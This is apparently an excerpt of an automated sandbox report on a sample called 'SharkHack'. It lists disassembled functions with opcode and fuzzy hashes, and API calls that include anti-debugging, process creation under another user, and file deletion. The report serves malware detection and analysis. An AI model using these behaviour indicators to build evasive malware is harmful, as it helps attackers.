                                                                                                          • Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 6f$$^q
                                                                                                          • API String ID: 0-857817941
                                                                                                          • Opcode ID: 4515aaf9456130c49d5fbe78ff4311a4be434391a5a19d90d3ae5eeb9d324287
                                                                                                          • Instruction ID: 6d2b441649554c23c97fd92be04ffbe6580e10200b7ca8c7f158c945e9cba58a
                                                                                                          • Opcode Fuzzy Hash: 4515aaf9456130c49d5fbe78ff4311a4be434391a5a19d90d3ae5eeb9d324287
                                                                                                          • Instruction Fuzzy Hash: F371D174E00208DFDB48DFA5D98459EBBB2FF88301F20842AD50AAB398DB319946CF51
                                                                                                          Function 089CFC40 Relevance: 1.7, APIs: 1, Instructions: 164processCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CreateProcessAsUserW.KERNELBASE(?,?,?,0000000A,?,?,?,?,?,?,?), ref: 089CFDAB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateProcessUser
                                                                                                          • String ID:
                                                                                                          • API String ID: 2217836671-0
                                                                                                          • Opcode ID: 88cef21857bee950b92750f7e52925cc21658525b06498134820a00838621d11
                                                                                                          • Instruction ID: 421dd87a6c70aebfe05c884295ce6d25430c55db2651cb9c2aa96693428c6e1a
                                                                                                          • Opcode Fuzzy Hash: 88cef21857bee950b92750f7e52925cc21658525b06498134820a00838621d11
                                                                                                          • Instruction Fuzzy Hash: 7A510871D00229DFDB24DF99C840BDDBBB6BF48314F1484AAE818B7250DB759A89CF90
                                                                                                          Function 06020940 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 060209B7
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2882067890.0000000006020000.00000040.00000800.00020000.00000000.sdmp, Offset: 06020000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6020000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CheckDebuggerPresentRemote
                                                                                                          • String ID:
                                                                                                          • API String ID: 3662101638-0
                                                                                                          • Opcode ID: 7f3fbbf681a3b21376987bb8680ab8eb1496d397209efd09125b7db6f4535aaa
                                                                                                          • Instruction ID: bf738c195c8351f93ec68b5ff7067c198386fd65ea4be7606558088d3b73f0d2
                                                                                                          • Opcode Fuzzy Hash: 7f3fbbf681a3b21376987bb8680ab8eb1496d397209efd09125b7db6f4535aaa
                                                                                                          • Instruction Fuzzy Hash: A32148B1C01259CFDB10CF9AD444BEEBBF4EF48320F14842AE455A3251C738A944CFA0
                                                                                                          Function 089C30DE Relevance: 1.5, Strings: 1, Instructions: 296COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: kQD
                                                                                                          • API String ID: 0-3066535408
                                                                                                          • Opcode ID: 108195c5fa6192a9843a5eccb284f8f78fbf6dcf2af81abea2c501c63624a460
                                                                                                          • Instruction ID: b3e05b72b1f5af8ae6668bdaa308905bd60f1af2d2394a040e4cfe60c7f96b8b
                                                                                                          • Opcode Fuzzy Hash: 108195c5fa6192a9843a5eccb284f8f78fbf6dcf2af81abea2c501c63624a460
                                                                                                          • Instruction Fuzzy Hash: 06D18C74E0520ADFCB04DFA9C4848AEFBB2FF89301B14D569D405AB315D735A982DF92
                                                                                                          Function 089C3140 Relevance: 1.5, Strings: 1, Instructions: 266COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: kQD
                                                                                                          • API String ID: 0-3066535408
                                                                                                          • Opcode ID: 61a008573a13ec67229da5be35ddba167095dd93fd98a29f525996ac90e54bb0
                                                                                                          • Instruction ID: d815a39bcd3d24963450135b3974db470174d220f120c141fbc22a99ca8e54c6
                                                                                                          • Opcode Fuzzy Hash: 61a008573a13ec67229da5be35ddba167095dd93fd98a29f525996ac90e54bb0
                                                                                                          • Instruction Fuzzy Hash: DFC17B74E0420ADFCB08DFA9C4848AEFBB2FF89301B14D559D415AB314D735AA82DF95
                                                                                                          Function 089C18C8 Relevance: 1.4, Strings: 1, Instructions: 145COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: >NG
                                                                                                          • API String ID: 0-1926143806
                                                                                                          • Opcode ID: 4370db9e3293fecd1a45c856e0d31d3e4bb784c542994f48358052d36e1c684f
                                                                                                          • Instruction ID: 00c86722731a1b458ea85245feb446c4ec643a362f5f29b334b8dc4de4581a52
                                                                                                          • Opcode Fuzzy Hash: 4370db9e3293fecd1a45c856e0d31d3e4bb784c542994f48358052d36e1c684f
                                                                                                          • Instruction Fuzzy Hash: 8B515BB0E052098FCB48DFAAD4406AEFBF2FF89301F14D56AD416B7255D7348941CB69
                                                                                                          Function 089C18D8 Relevance: 1.4, Strings: 1, Instructions: 143COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: >NG
                                                                                                          • API String ID: 0-1926143806
                                                                                                          • Opcode ID: 2a1b0b0d12ecf6e17ceee13c233cfd5cedb86eee88114daf09aa58f820263a59
                                                                                                          • Instruction ID: b9cf374b12673d79fdc1a3f33c1a8681f453f2e07553596b48af0a4d33bd29c1
                                                                                                          • Opcode Fuzzy Hash: 2a1b0b0d12ecf6e17ceee13c233cfd5cedb86eee88114daf09aa58f820263a59
                                                                                                          • Instruction Fuzzy Hash: 99513A70E052098FCB48CFAAD4506AEFBF2FF89301F14D52AD41AB7255D7349A418B69
                                                                                                          Function 08A0E9C8 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889982132.0000000008A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A00000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8a00000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: <
                                                                                                          • API String ID: 0-4251816714
                                                                                                          • Opcode ID: c90f7572ad50f40ee7a790d103de3d97b3f3c7dc883fa5f0fec1699a716af779
                                                                                                          • Instruction ID: bf0c918d62a98927c771394ca7f08e8f040e8d771e2cfa77558c94494116aa45
                                                                                                          • Opcode Fuzzy Hash: c90f7572ad50f40ee7a790d103de3d97b3f3c7dc883fa5f0fec1699a716af779
                                                                                                          • Instruction Fuzzy Hash: 2C518475E01618CFDB58CFAAC9446DDBBF2AFC9301F14C4AAD409AB264EB345A85CF40
                                                                                                          Function 08A0E9C1 Relevance: 1.4, Strings: 1, Instructions: 113COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889982132.0000000008A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A00000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8a00000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: <
                                                                                                          • API String ID: 0-4251816714
                                                                                                          • Opcode ID: 88c34aa38927afc90343058f71831e4b5a76e5018c3d8be9ac5588bfdd8f4ed1
                                                                                                          • Instruction ID: e0141f8e64417204f1d2aaa1e1f96bffb0ba0542508b2c5a68ff4dc42e28da89
                                                                                                          • Opcode Fuzzy Hash: 88c34aa38927afc90343058f71831e4b5a76e5018c3d8be9ac5588bfdd8f4ed1
                                                                                                          • Instruction Fuzzy Hash: 265185B5E016588FDB58CFAAC9446DDBBF2AFC9301F14C4AAD409AB264DB345A85CF40
                                                                                                          Function 08A02AC8 Relevance: .6, Instructions: 602COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889982132.0000000008A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A00000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8a00000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: f83f7c4d2d0293f598eb37b1e57a8f10e579c82a22b26423c936ff24a18a56d4
                                                                                                          • Instruction ID: a96c060d901a55388db6e8659b96a63a83c49e8ac2a2ffe32f026725a24976a9
                                                                                                          • Opcode Fuzzy Hash: f83f7c4d2d0293f598eb37b1e57a8f10e579c82a22b26423c936ff24a18a56d4
                                                                                                          • Instruction Fuzzy Hash: E0329A31E002159FDB09EFB9D984A5DBBF2FF89300F5185AAD049AB351EE349C46CB52
                                                                                                          Function 08A02AC6 Relevance: .6, Instructions: 565COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889982132.0000000008A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A00000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8a00000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 340eb753cb89e9ba4e1dc39d056899ab86b8e3e705fb4f42f9c021f6aef0f1b5
                                                                                                          • Instruction ID: a49bf0b722cd3e5cd0051635ee16bb39777380b40f37f76d93423b8918c03ed2
                                                                                                          • Opcode Fuzzy Hash: 340eb753cb89e9ba4e1dc39d056899ab86b8e3e705fb4f42f9c021f6aef0f1b5
                                                                                                          • Instruction Fuzzy Hash: EB228C31E106159FDB08EFB9D984A5DBBF2FF88700F5185AAD049AB350EE349C46CB52
                                                                                                          Function 089CAEB0 Relevance: .3, Instructions: 319COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 9d35aa1e23004fb318de26ce326a5beafe5c1e1117d1a966624572a562b14107
                                                                                                          • Instruction ID: 20c80dce694b88510f1c2d2a476f8defb99c3de77ed23de47d13a9abbb7d1451
                                                                                                          • Opcode Fuzzy Hash: 9d35aa1e23004fb318de26ce326a5beafe5c1e1117d1a966624572a562b14107
                                                                                                          • Instruction Fuzzy Hash: 96E11674A1566ACFCB64CF69C94479DFBB6BF88340F1095EAD40EAB214DB349E858F00
                                                                                                          Function 089CA370 Relevance: .2, Instructions: 159COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: f2ed2a33f277faab363b2a860142500731803298d87edb10275bc31158a86969
                                                                                                          • Instruction ID: 24aa728e2aa66c3f6a01412ac5be57d2d171efab28d6304d827a324f6ba14a5e
                                                                                                          • Opcode Fuzzy Hash: f2ed2a33f277faab363b2a860142500731803298d87edb10275bc31158a86969
                                                                                                          • Instruction Fuzzy Hash: 156124B0D0022DDFCB08DFA5D954AAEBBF2FB48302F10992ED416AB290D7755A01DF52
                                                                                                          Function 089C22A0 Relevance: .1, Instructions: 119COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: f903f711cb6115e3758496bae6083e73197eefd720d5cafa527d217bcc124808
                                                                                                          • Instruction ID: a65297d5a91ac4f36b726e230290f1f8050fd5448c3e24435723300744e2bccd
                                                                                                          • Opcode Fuzzy Hash: f903f711cb6115e3758496bae6083e73197eefd720d5cafa527d217bcc124808
                                                                                                          • Instruction Fuzzy Hash: 905126B0D01218CFDB18DFA6D8846DEBBB2FF88311F1484A9D509AB254CB756A85CF40
                                                                                                          Function 089C2290 Relevance: .1, Instructions: 110COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 59b58b2d4b21af1cc0fd1cb6ebfb4bf90f6ba80ddd5df94fddc0442d2406001b
                                                                                                          • Instruction ID: bcf6dd0bba3844d5dc7fd34ec97c8c4e8a709f32744672787815355460688410
                                                                                                          • Opcode Fuzzy Hash: 59b58b2d4b21af1cc0fd1cb6ebfb4bf90f6ba80ddd5df94fddc0442d2406001b
                                                                                                          • Instruction Fuzzy Hash: 1B416AB0D01258CFDB18DFA6C8806DEBBF2BF88311F14C4AAD409AB254DB755A85CF51
                                                                                                          Function 089CEB40 Relevance: .1, Instructions: 97COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 62cf2519e5ffea5b3e9c9e6f73bb3e0dfacebe2c05bd806f8d539137139874e5
                                                                                                          • Instruction ID: 2fcdff87d9e70e30e8510da87fa5c0894a8a4ea6b6b38e1fc772b311a7674866
                                                                                                          • Opcode Fuzzy Hash: 62cf2519e5ffea5b3e9c9e6f73bb3e0dfacebe2c05bd806f8d539137139874e5
                                                                                                          • Instruction Fuzzy Hash: 9C41E4B4E04618CBDB18CFAAD8446DEBBF2BFC8310F14C06AD449AB254EB715A85CF54
                                                                                                          Function 089C0040 Relevance: .1, Instructions: 84COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: b5a65de9e653b760d25d88fe46b8878293c8a0a0acc4375ca15f49412f475fdb
                                                                                                          • Instruction ID: 08d7fe59360a4267d3c81fd8b4a8fe42d44d719333a3753e380c67a9c29ddf37
                                                                                                          • Opcode Fuzzy Hash: b5a65de9e653b760d25d88fe46b8878293c8a0a0acc4375ca15f49412f475fdb
                                                                                                          • Instruction Fuzzy Hash: 9F31D675E006198FEB58DFAAD84079EBBB7BFC8201F14C1AAD40CA7264DB305A45CF21
                                                                                                          Function 089C5808 Relevance: .1, Instructions: 65COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: beddf820b10455a70c903bacd7e6b38a21417f6104f2152b94c99200808671d5
                                                                                                          • Instruction ID: b78b9c8abf61bc02016b4d613361f61cb3d36f90a56e1553f50ef930cec0a8a7
                                                                                                          • Opcode Fuzzy Hash: beddf820b10455a70c903bacd7e6b38a21417f6104f2152b94c99200808671d5
                                                                                                          • Instruction Fuzzy Hash: E521E971E016188BEB58CF6BDC4069EFBF7BFC8200F04C1BAC918A6264DB351A468F55
                                                                                                          Function 087409B0 Relevance: 4.8, Strings: 3, Instructions: 1020COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 5978 87409b0-8740b76 5999 874164a-874165e 5978->5999 6000 8741664 5999->6000 6001 8740b7b-8740b87 5999->6001 6002 8741669-874167c 6000->6002 6003 8741682-874169b 6001->6003 6004 8740b8d-8740bf8 6001->6004 6008 8741680 6003->6008 6009 874169d-87416e3 6003->6009 6174 8740bfa call 8741c85 6004->6174 6175 8740bfa call 8741d40 6004->6175 6176 8740bfa call 8741cd1 6004->6176 6177 8740bfa call 8741c3d 6004->6177 6178 8740bfa call 8741ccd 6004->6178 6179 8740bfa call 8741cc9 6004->6179 6008->6003 6011 87416ec-8741708 6008->6011 6009->6002 6017 87416e5-87416ea 6009->6017 6012 874172f-874174c 6011->6012 6013 874170a-874172c 6011->6013 6016 8741751-874177c call 874d82b 6012->6016 6013->6012 6021 874177d-8741785 6016->6021 6017->6011 6021->6016 6023 8741787-87417b6 6021->6023 6022 8740bff-8740c11 6180 8740c13 call 8742a48 6022->6180 6181 8740c13 call 8742a39 6022->6181 6024 87417f8-874181c 6023->6024 6025 87417b8-87417c5 6023->6025 6025->6021 6027 87417c7-87417d2 6025->6027 6027->6024 6028 8740c18-8740dd8 call 8742be6 6051 874167d 6028->6051 6052 8740dde-8740ea8 6028->6052 6051->6008 6052->6051 6063 8740eae-8740f5f 6052->6063 6063->6051 6073 8740f65-8741059 6063->6073 6086 874147c-8741490 6073->6086 6087 8741496-8741574 6086->6087 6088 874105e-874106a 6086->6088 6112 874157a-8741648 6087->6112 6088->6003 6089 8741070-8741259 6088->6089 6089->6051 6140 874125f-8741476 6089->6140 6112->5999 6112->6051 6140->6051 6140->6086 6174->6022 6175->6022 6176->6022 6177->6022 6178->6022 6179->6022 6180->6028 6181->6028
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: G$Te^q$Te^q
                                                                                                          • API String ID: 0-3949708683
                                                                                                          • Opcode ID: 880e541fea52aee40319505f38ed9c6fda9d775f68c67409cd43941b70dd4aaa
                                                                                                          • Instruction ID: 538597f74d58b2405a89b869b21c6ad00178640d65ac48a24f702ce9457f0b2c
                                                                                                          • Opcode Fuzzy Hash: 880e541fea52aee40319505f38ed9c6fda9d775f68c67409cd43941b70dd4aaa
                                                                                                          • Instruction Fuzzy Hash: 0182D030A05215CFD705BB79DC94A5CBBF1FF4A204F8585EAD088E7351DA389D8ACB62
                                                                                                          Function 08742468 Relevance: 4.0, Strings: 3, Instructions: 245COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (bq$(bq$(bq
                                                                                                          • API String ID: 0-2716923250
                                                                                                          • Opcode ID: b239613eb17e772f3848e0b5ec450e436557e2011fb21551167d4fd98447ca1a
                                                                                                          • Instruction ID: 4d2a08196ba8e69a67b04603efe01bb37859ff765fbeac348e40cd11d9c5e49a
                                                                                                          • Opcode Fuzzy Hash: b239613eb17e772f3848e0b5ec450e436557e2011fb21551167d4fd98447ca1a
                                                                                                          • Instruction Fuzzy Hash: F1A17E70A00349DFCB14DFA9C45469EBBF2FF89310F24856DE405AB355DB70A886CBA1
                                                                                                          Function 08742A48 Relevance: 2.6, Strings: 2, Instructions: 138COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Hbq$Hbq
                                                                                                          • API String ID: 0-4258043069
                                                                                                          • Opcode ID: 09f0defe4775657498ee7db9c474da6883ee64b71a200d730e697f10017a9001
                                                                                                          • Instruction ID: 1cab2cc58bb72b4713817fe38d3099d6d0cd813c39e9aff794ff49258ce1b61d
                                                                                                          • Opcode Fuzzy Hash: 09f0defe4775657498ee7db9c474da6883ee64b71a200d730e697f10017a9001
                                                                                                          • Instruction Fuzzy Hash: A841E420B443845FD749EB79986427F7FFBEFC6200B24846AD005DB396DE349D0683A6
                                                                                                          Function 08743B7B Relevance: 2.6, Strings: 2, Instructions: 63COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: TJcq$Te^q
                                                                                                          • API String ID: 0-918715239
                                                                                                          • Opcode ID: 8cc91aacea5804ed5112f7e76eedc4f9972b660a020c166ee94d9e722ab11454
                                                                                                          • Instruction ID: da5fb2e34fbbe497c5d9fab4aebd44b172d20bd626d5d87c90dc6efd08254464
                                                                                                          • Opcode Fuzzy Hash: 8cc91aacea5804ed5112f7e76eedc4f9972b660a020c166ee94d9e722ab11454
                                                                                                          • Instruction Fuzzy Hash: 8B1129757442515FC7066B3CE854A6E3BE6AFC6610B1540ABE005CF3A2CE28DC0BC3A6
                                                                                                          Function 08743BA8 Relevance: 2.5, Strings: 2, Instructions: 43COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: TJcq$Te^q
                                                                                                          • API String ID: 0-918715239
                                                                                                          • Opcode ID: 6d6669756b18d62346db9648c351e8beb442af8481e0a42cfcc244c8f44436f7
                                                                                                          • Instruction ID: c920e8dc6b0898b32cea990cb071eda0c8eb83c7f45603a832c69cdaf41b238a
                                                                                                          • Opcode Fuzzy Hash: 6d6669756b18d62346db9648c351e8beb442af8481e0a42cfcc244c8f44436f7
                                                                                                          • Instruction Fuzzy Hash: 59F0F6353401111FCA08A77DE558D3F76DBAFC9A24354405AE50ACF3A0CD65DC038796
                                                                                                          Function 08743268 Relevance: 1.8, Strings: 1, Instructions: 533COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Te^q
                                                                                                          • API String ID: 0-671973202
                                                                                                          • Opcode ID: 0ad8311cec72b5be4838c7584addd5ff3d561ea38f8bb3d6ee811d2c3d6aba88
                                                                                                          • Instruction ID: 56a610728cb821f7c3a14d4c11309718cc18066858485e03c85c5048dc45b3a9
                                                                                                          • Opcode Fuzzy Hash: 0ad8311cec72b5be4838c7584addd5ff3d561ea38f8bb3d6ee811d2c3d6aba88
                                                                                                          • Instruction Fuzzy Hash: 83127D74B10214DBC744FFB9E98866DBBF6FB88604F90852DD089A7355DE389C0ACB52
                                                                                                          Function 08743278 Relevance: 1.8, Strings: 1, Instructions: 527COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Te^q
                                                                                                          • API String ID: 0-671973202
                                                                                                          • Opcode ID: 1bf025edd520df5213de8ebaa6c2fbfeaaf71762035a42617bec9c32c0b27fe6
                                                                                                          • Instruction ID: 1b7334a76b0a79777ec1149d8090822f8408d91f11fcbf5b3cfa97ff23a1781e
                                                                                                          • Opcode Fuzzy Hash: 1bf025edd520df5213de8ebaa6c2fbfeaaf71762035a42617bec9c32c0b27fe6
                                                                                                          • Instruction Fuzzy Hash: CB026C74B10214DBC744FFB9E98866DBBF6EB88604F90852DD089A7355DE389C0ACB52
                                                                                                          Function 08743C42 Relevance: 1.7, Strings: 1, Instructions: 448COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 4c^q
                                                                                                          • API String ID: 0-396817635
                                                                                                          • Opcode ID: beb6e2e7ab6c1896db6633a1d9a077a6cbac717369ab77d317d323789d05687b
                                                                                                          • Instruction ID: abd13e8c3300633414d4ed2c88d983c09513397c263dd2e05a33075708bda0ab
                                                                                                          • Opcode Fuzzy Hash: beb6e2e7ab6c1896db6633a1d9a077a6cbac717369ab77d317d323789d05687b
                                                                                                          • Instruction Fuzzy Hash: 2F02AE34B01205CFC704EF78D99456DBBF2FF89204B5184A9D44A9B3A6DB35DC06CB66
                                                                                                          Function 08EFC075 Relevance: 1.6, APIs: 1, Instructions: 143fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • DeleteFileW.KERNELBASE(00000000), ref: 08EFC188
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2890193084.0000000008EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EF0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8ef0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DeleteFile
                                                                                                          • String ID:
